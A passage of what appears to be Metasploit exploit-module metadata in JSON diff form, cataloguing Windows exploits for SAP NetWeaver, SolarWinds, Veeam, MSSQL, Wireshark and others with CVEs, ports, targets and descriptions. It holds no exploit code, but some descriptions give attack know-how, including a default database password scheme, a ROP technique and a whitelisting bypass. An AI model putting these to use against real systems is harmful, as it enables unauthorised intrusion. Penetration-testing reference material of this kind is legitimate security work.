"This module exploits a stack buffer overflow in the SAP NetWeaver Dispatcher\n service. The overflow occurs in the DiagTraceR3Info() function and allows a remote\n attacker to execute arbitrary code by supplying a special crafted Diag packet. The\n Dispatcher service is only vulnerable if the Developer Traces have been configured\n at levels 2 or 3. The module has been successfully tested on SAP Netweaver 7.0 EHP2\n SP6 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass).", - "references": [ - "OSVDB-81759", - "CVE-2012-2611", - "BID-53424", - "EDB-20705", - "URL-http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities", - "URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities_reversing_and_breaking_the_Diag_protocol" - ], - "platform": "Windows", - "arch": "", - "rport": 3200, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SAP Netweaver 7.0 EHP2 SP6 / Windows XP SP3", - "SAP Netweaver 7.0 EHP2 SP6 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb", - "is_install_path": true, - "ref_name": "windows/misc/sap_netweaver_dispatcher", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/shixxnote_font": { - "name": "ShixxNOTE 6.net Font Field Overflow", - "fullname": "exploit/windows/misc/shixxnote_font", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-10-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in ShixxNOTE 6.net.\n The vulnerability is caused due to boundary errors in the\n handling of font fields.", - "references": [ - "CVE-2004-1595", - "OSVDB-10721", - "BID-11409" - ], - "platform": "Windows", - "arch": "", - "rport": 2000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ShixxNOTE 6.net Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/shixxnote_font.rb", - "is_install_path": true, - "ref_name": "windows/misc/shixxnote_font", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/solarwinds_amqp_deserialization": { - "name": "SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE", - "fullname": "exploit/windows/misc/solarwinds_amqp_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-10-19", - "type": "exploit", - "author": [ - "Justin Hong", - "Lucas Miller", - "Piotr Bazydło", - "Spencer McIntyre" - ], - "description": "The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the\n AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted\n message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\\SYSTEM.", - "references": [ - "CVE-2022-38108", - "URL-https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor", - "URL-https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 5671, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-03-23 17:28:17 +0000", - "path": "/modules/exploits/windows/misc/solarwinds_amqp_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/misc/solarwinds_amqp_deserialization", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/solidworks_workgroup_pdmwservice_file_write": { - "name": "SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write", - "fullname": "exploit/windows/misc/solidworks_workgroup_pdmwservice_file_write", - "aliases": [], - "rank": 400, - "disclosure_date": "2014-02-22", - "type": "exploit", - "author": [ - "Mohamed Shetta ", - "bcoles " - ], - "description": "This module exploits a remote arbitrary file write vulnerability in\n SolidWorks Workgroup PDM 2014 SP2 and prior.\n\n For targets running Windows Vista or newer the payload is written to the\n startup folder for all users and executed upon next user logon.\n\n For targets before Windows Vista code execution can be achieved by first\n uploading the payload as an exe file, and then upload another mof file,\n which schedules WMI to execute the uploaded payload.\n\n This module has been tested successfully on SolidWorks Workgroup PDM\n 2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).", - "references": [ - "CVE-2014-100015", - "EDB-31831", - "OSVDB-103671" - ], - "platform": "Windows", - "arch": "", - "rport": 30000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)", - "SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb", - "is_install_path": true, - "ref_name": "windows/misc/solidworks_workgroup_pdmwservice_file_write", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/splayer_content_type": { - "name": "SPlayer 3.7 Content-Type Buffer Overflow", - "fullname": "exploit/windows/misc/splayer_content_type", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-04", - "type": "exploit", - "author": [ - "xsploitedsec ", - "sinn3r " - ], - "description": "This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer\n requests the URL of a media file (video or audio), it is possible to gain arbitrary\n remote code execution due to a buffer overflow caused by an exceeding length of data\n as the 'Content-Type' parameter.", - "references": [ - "OSVDB-72181", - "EDB-17243" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2/XP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/splayer_content_type.rb", - "is_install_path": true, - "ref_name": "windows/misc/splayer_content_type", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/stream_down_bof": { - "name": "CoCSoft StreamDown 6.8.0 Buffer Overflow", - "fullname": "exploit/windows/misc/stream_down_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-12-27", - "type": "exploit", - "author": [ - "Fady Mohamed Osman " - ], - "description": "Stream Down 6.8.0 seh based buffer overflow triggered when processing\n the server response packet. During the overflow a structured exception\n handler is overwritten.", - "references": [ - "CVE-2011-5052", - "OSVDB-78043", - "BID-51190", - "URL-http://www.dark-masters.tk/", - "URL-http://web.archive.org/web/20121024141958/http://secunia.com/advisories/47343", - "EDB-18283" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "StreamDown 6.8.0" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/misc/stream_down_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/stream_down_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/talkative_response": { - "name": "Talkative IRC v0.4.4.16 Response Buffer Overflow", - "fullname": "exploit/windows/misc/talkative_response", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-03-17", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.\n When a specially crafted response string is sent to a client,\n an attacker may be able to execute arbitrary code.", - "references": [ - "OSVDB-64582", - "BID-34141", - "EDB-8227" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/talkative_response.rb", - "is_install_path": true, - "ref_name": "windows/misc/talkative_response", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/tiny_identd_overflow": { - "name": "TinyIdentD 2.2 Stack Buffer Overflow", - "fullname": "exploit/windows/misc/tiny_identd_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-05-14", - "type": "exploit", - "author": [ - "Maarten Boone", - "Jacopo Cervini " - ], - "description": "This module exploits a stack based buffer overflow in TinyIdentD\n version 2.2.\n If we send a long string to the ident service we can overwrite the\n return address and execute arbitrary code. Credit to Maarten Boone.", - "references": [ - "BID-23981", - "CVE-2007-2711", - "EDB-3925", - "OSVDB-36053" - ], - "platform": "Windows", - "arch": "", - "rport": 113, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 Server SP4 - English", - "Windows 2000 Pro All - English", - "Windows 2000 Pro All - Italian", - "Windows 2000 Pro All - French", - "Windows XP SP0/1 - English", - "Windows XP SP2 - English", - "Windows XP SP2 - Italian" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/tiny_identd_overflow.rb", - "is_install_path": true, - "ref_name": "windows/misc/tiny_identd_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/trendmicro_cmdprocessor_addtask": { - "name": "TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow", - "fullname": "exploit/windows/misc/trendmicro_cmdprocessor_addtask", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-12-07", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Blue" - ], - "description": "This module exploits a vulnerability in the CmdProcessor.exe component of Trend\n Micro Control Manger up to version 5.5.\n\n The specific flaw exists within CmdProcessor.exe service running on TCP port\n 20101. The vulnerable function is the CGenericScheduler::AddTask function of\n cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet,\n controlled data is copied into a 256-byte stack buffer. This can be exploited\n to execute remote code under the context of the user.", - "references": [ - "CVE-2011-5001", - "OSVDB-77585", - "ZDI-11-345" - ], - "platform": "Windows", - "arch": "", - "rport": 20101, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2003 Server SP2 (DEP Bypass)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb", - "is_install_path": true, - "ref_name": "windows/misc/trendmicro_cmdprocessor_addtask", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ufo_ai": { - "name": "UFO: Alien Invasion IRC Client Buffer Overflow", - "fullname": "exploit/windows/misc/ufo_ai", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-10-28", - "type": "exploit", - "author": [ - "Jason Geffner", - "dookie" - ], - "description": "This module exploits a buffer overflow in the IRC client component of\n UFO: Alien Invasion 2.2.1.", - "references": [ - "OSVDB-65689", - "EDB-14013" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ufo_ai.rb", - "is_install_path": true, - "ref_name": "windows/misc/ufo_ai", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/unified_remote_rce": { - "name": "Unified Remote Auth Bypass to RCE", - "fullname": "exploit/windows/misc/unified_remote_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-02-25", - "type": "exploit", - "author": [ - "h00die", - "H4RK3NZ0" - ], - "description": "This module utilizes the Unified Remote remote control protocol to type out and\n deploy a payload. The remote control protocol can be configured to have no passwords,\n a group password, or individual user accounts. If the web page is accessible, the\n access control is set to no password for exploitation, then reverted.\n If the web page is not accessible, exploitation will be tried blindly.\n This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.", - "references": [ - "EDB-49587", - "URL-https://www.unifiedremote.com/", - "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py", - "CVE-2022-3229" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": 9512, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "default" - ], - "mod_time": "2023-04-16 10:11:01 +0000", - "path": "/modules/exploits/windows/misc/unified_remote_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/unified_remote_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "screen-effects", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/veeam_one_agent_deserialization": { - "name": "Veeam ONE Agent .NET Deserialization", - "fullname": "exploit/windows/misc/veeam_one_agent_deserialization", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-04-15", - "type": "exploit", - "author": [ - "Michael Zanetta", - "Edgar Boda-Majer", - "wvu " - ], - "description": "This module exploits a .NET deserialization vulnerability in the Veeam\n ONE Agent before the hotfix versions 9.5.5.4587 and 10.0.1.750 in the\n 9 and 10 release lines.\n\n Specifically, the module targets the HandshakeResult() method used by\n the Agent. By inducing a failure in the handshake, the Agent will\n deserialize untrusted data.\n\n Tested against the pre-patched release of 10.0.0.750. Note that Veeam\n continues to distribute this version but with the patch pre-applied.", - "references": [ - "CVE-2020-10914", - "CVE-2020-10915", - "ZDI-20-545", - "ZDI-20-546", - "URL-https://www.veeam.com/kb3144" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 2805, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2021-02-16 13:56:50 +0000", - "path": "/modules/exploits/windows/misc/veeam_one_agent_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/misc/veeam_one_agent_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/vmhgfs_webdav_dll_sideload": { - "name": "DLL Side Loading Vulnerability in VMware Host Guest Client Redirector", - "fullname": "exploit/windows/misc/vmhgfs_webdav_dll_sideload", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-08-05", - "type": "exploit", - "author": [ - "Yorick Koster" - ], - "description": "A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\n a component of VMware Tools. This issue can be exploited by luring a victim into\n opening a document from the attacker's share. An attacker can exploit this issue to\n execute arbitrary code with the privileges of the target user. This can potentially\n result in the attacker taking complete control of the affected system. If the WebDAV\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.", - "references": [ - "CVE-2016-5330", - "URL-https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html", - "URL-https://www.vmware.com/in/security/advisories/VMSA-2016-0010.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64", - "Windows x86" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb", - "is_install_path": true, - "ref_name": "windows/misc/vmhgfs_webdav_dll_sideload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/webdav_delivery": { - "name": "Serve DLL via webdav server", - "fullname": "exploit/windows/misc/webdav_delivery", - "aliases": [], - "rank": 0, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Ryan Hanson ", - "James Cook " - ], - "description": "This module simplifies the rundll32.exe Application Whitelisting Bypass technique.\n The module creates a webdav server that hosts a dll file. When the user types the provided rundll32\n command on a system, rundll32 will load the dll remotly and execute the provided export function.\n The export function needs to be valid, but the default meterpreter function can be anything.\n The process does write the dll to C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\n but does not load the dll from that location. This file should be removed after execution.\n The extension can be anything you'd like, but you don't have to use one. Two files will be\n written to disk. One named the requested name and one with a dll extension attached.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/webdav_delivery.rb", - "is_install_path": true, - "ref_name": "windows/misc/webdav_delivery", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/wifi_mouse_rce": { - "name": "Wifi Mouse RCE", - "fullname": "exploit/windows/misc/wifi_mouse_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-02-25", - "type": "exploit", - "author": [ - "h00die", - "REDHATAUGUST", - "H4RK3NZ0" - ], - "description": "The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the\n authentication is completely implemented entirely on the client side. By utilizing\n this vulnerability, is possible to open a program on the server\n (cmd.exe in our case) and type commands that will be executed as the user running\n WiFi Mouse (Mouse Server), resulting in remote code execution.\n\n Tested against versions 1.8.3.4 (current as of module writing) and\n 1.8.2.3.", - "references": [ - "EDB-50972", - "EDB-49601", - "CVE-2022-3218", - "URL-http://wifimouse.necta.us/", - "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": 1978, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "stager" - ], - "mod_time": "2022-09-26 15:45:42 +0000", - "path": "/modules/exploits/windows/misc/wifi_mouse_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/wifi_mouse_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "screen-effects", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/windows_rsh": { - "name": "Windows RSH Daemon Buffer Overflow", - "fullname": "exploit/windows/misc/windows_rsh", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-07-24", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a vulnerability in Windows RSH daemon 1.8.\n The vulnerability is due to a failure to check for the length of input sent\n to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit\n to be successful.", - "references": [ - "CVE-2007-4006", - "OSVDB-38572", - "BID-25044" - ], - "platform": "Windows", - "arch": "", - "rport": 514, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2003 SP1 English", - "Windows XP Pro SP2 English", - "Windows 2000 Pro SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/windows_rsh.rb", - "is_install_path": true, - "ref_name": "windows/misc/windows_rsh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/wireshark_lua": { - "name": "Wireshark console.lua Pre-Loading Script Execution", - "fullname": "exploit/windows/misc/wireshark_lua", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-07-18", - "type": "exploit", - "author": [ - "Haifei Li", - "sinn3r " - ], - "description": "This module exploits a vulnerability in Wireshark 1.6 or less. When opening a\n pcap file, Wireshark will actually check if there's a 'console.lua' file in the same\n directory, and then parse/execute the script if found. Versions affected by this\n vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8", - "references": [ - "CVE-2011-3360", - "OSVDB-75347", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6136", - "URL-http://technet.microsoft.com/en-us/security/msvr/msvr11-014" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Wireshark 1.6.1 or less" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/wireshark_lua.rb", - "is_install_path": true, - "ref_name": "windows/misc/wireshark_lua", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/wireshark_packet_dect": { - "name": "Wireshark packet-dect.c Stack Buffer Overflow", - "fullname": "exploit/windows/misc/wireshark_packet_dect", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-18", - "type": "exploit", - "author": [ - "Paul Makowski", - "sickness", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4\n by sending a malicious packet.", - "references": [ - "CVE-2011-1591", - "OSVDB-71848", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836", - "EDB-17185" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Win32 Universal (Generic DEP & ASLR Bypass)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/wireshark_packet_dect.rb", - "is_install_path": true, - "ref_name": "windows/misc/wireshark_packet_dect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mmsp/ms10_025_wmss_connect_funnel": { - "name": "Windows Media Services ConnectFunnel Stack Buffer Overflow", - "fullname": "exploit/windows/mmsp/ms10_025_wmss_connect_funnel", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-04-13", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the Windows Media\n Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially\n crafted FunnelConnect request, an attacker can execute arbitrary code\n under the \"NetShowServices\" user account. Windows Media Services 4.1 ships\n with Windows 2000 Server, but is not installed by default.\n\n NOTE: This service does NOT restart automatically. Successful, as well as\n unsuccessful exploitation attempts will kill the service which prevents\n additional attempts.", - "references": [ - "CVE-2010-0478", - "OSVDB-63726", - "MSB-MS10-025", - "URL-https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 1755, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb", - "is_install_path": true, - "ref_name": "windows/mmsp/ms10_025_wmss_connect_funnel", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/motorola/timbuktu_fileupload": { - "name": "Timbuktu Pro Directory Traversal/File Upload", - "fullname": "exploit/windows/motorola/timbuktu_fileupload", - "aliases": [], - "rank": 600, - "disclosure_date": "2008-05-10", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a directory traversal vulnerability in Motorola's\n Timbuktu Pro for Windows 8.6.5.", - "references": [ - "CVE-2008-1117", - "OSVDB-43544" - ], - "platform": "Windows", - "arch": "", - "rport": 407, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/motorola/timbuktu_fileupload.rb", - "is_install_path": true, - "ref_name": "windows/motorola/timbuktu_fileupload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/lyris_listmanager_weak_pass": { - "name": "Lyris ListManager MSDE Weak sa Password", - "fullname": "exploit/windows/mssql/lyris_listmanager_weak_pass", - "aliases": [], - "rank": 600, - "disclosure_date": "2005-12-08", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a weak password vulnerability in the\n Lyris ListManager MSDE install. During installation, the 'sa'\n account password is set to 'lminstall'. Once the install\n completes, it is set to 'lyris' followed by the process\n ID of the installer. This module brute forces all possible\n process IDs that would be used by the installer.", - "references": [ - "CVE-2005-4145", - "OSVDB-21559" - ], - "platform": "Windows", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2024-02-19 10:57:53 +0000", - "path": "/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb", - "is_install_path": true, - "ref_name": "windows/mssql/lyris_listmanager_weak_pass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/ms02_039_slammer": { - "name": "MS02-039 Microsoft SQL Server Resolution Overflow", - "fullname": "exploit/windows/mssql/ms02_039_slammer", - "aliases": [], - "rank": 400, - "disclosure_date": "2002-07-24", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This is an exploit for the SQL Server 2000 resolution\n service buffer overflow. This overflow is triggered by\n sending a udp packet to port 1434 which starts with 0x04 and\n is followed by long string terminating with a colon and a\n number. This module should work against any vulnerable SQL\n Server 2000 or MSDE install (pre-SP3).", - "references": [ - "CVE-2002-0649", - "OSVDB-4578", - "BID-5310", - "MSB-MS02-039" - ], - "platform": "Windows", - "arch": "", - "rport": 1434, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "MSSQL 2000 / MSDE <= SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mssql/ms02_039_slammer.rb", - "is_install_path": true, - "ref_name": "windows/mssql/ms02_039_slammer", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/ms02_056_hello": { - "name": "MS02-056 Microsoft SQL Server Hello Overflow", - "fullname": "exploit/windows/mssql/ms02_056_hello", - "aliases": [], - "rank": 400, - "disclosure_date": "2002-08-05", - "type": "exploit", - "author": [ - "MC " - ], - "description": "By sending malformed data to TCP port 1433, an\n unauthenticated remote attacker could overflow a buffer and\n possibly execute code on the server with SYSTEM level\n privileges. This module should work against any vulnerable\n SQL Server 2000 or MSDE install (< SP3).", - "references": [ - "CVE-2002-1123", - "OSVDB-10132", - "BID-5411", - "MSB-MS02-056" - ], - "platform": "Windows", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "MSSQL 2000 / MSDE <= SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mssql/ms02_056_hello.rb", - "is_install_path": true, - "ref_name": "windows/mssql/ms02_056_hello", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/ms09_004_sp_replwritetovarbin": { - "name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption", - "fullname": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-12-09", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n An authenticated database session is required to access the vulnerable code.\n That said, it is possible to access the vulnerable code via an SQL injection\n vulnerability.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.", - "references": [ - "OSVDB-50589", - "CVE-2008-5416", - "BID-32710", - "MSB-MS09-004", - "EDB-7501" - ], - "platform": "Windows", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "Automatic", - "MSSQL 2000 / MSDE SP0 (8.00.194)", - "MSSQL 2000 / MSDE SP1 (8.00.384)", - "MSSQL 2000 / MSDE SP2 (8.00.534)", - "MSSQL 2000 / MSDE SP3 (8.00.760)", - "MSSQL 2000 / MSDE SP4 (8.00.2039)", - 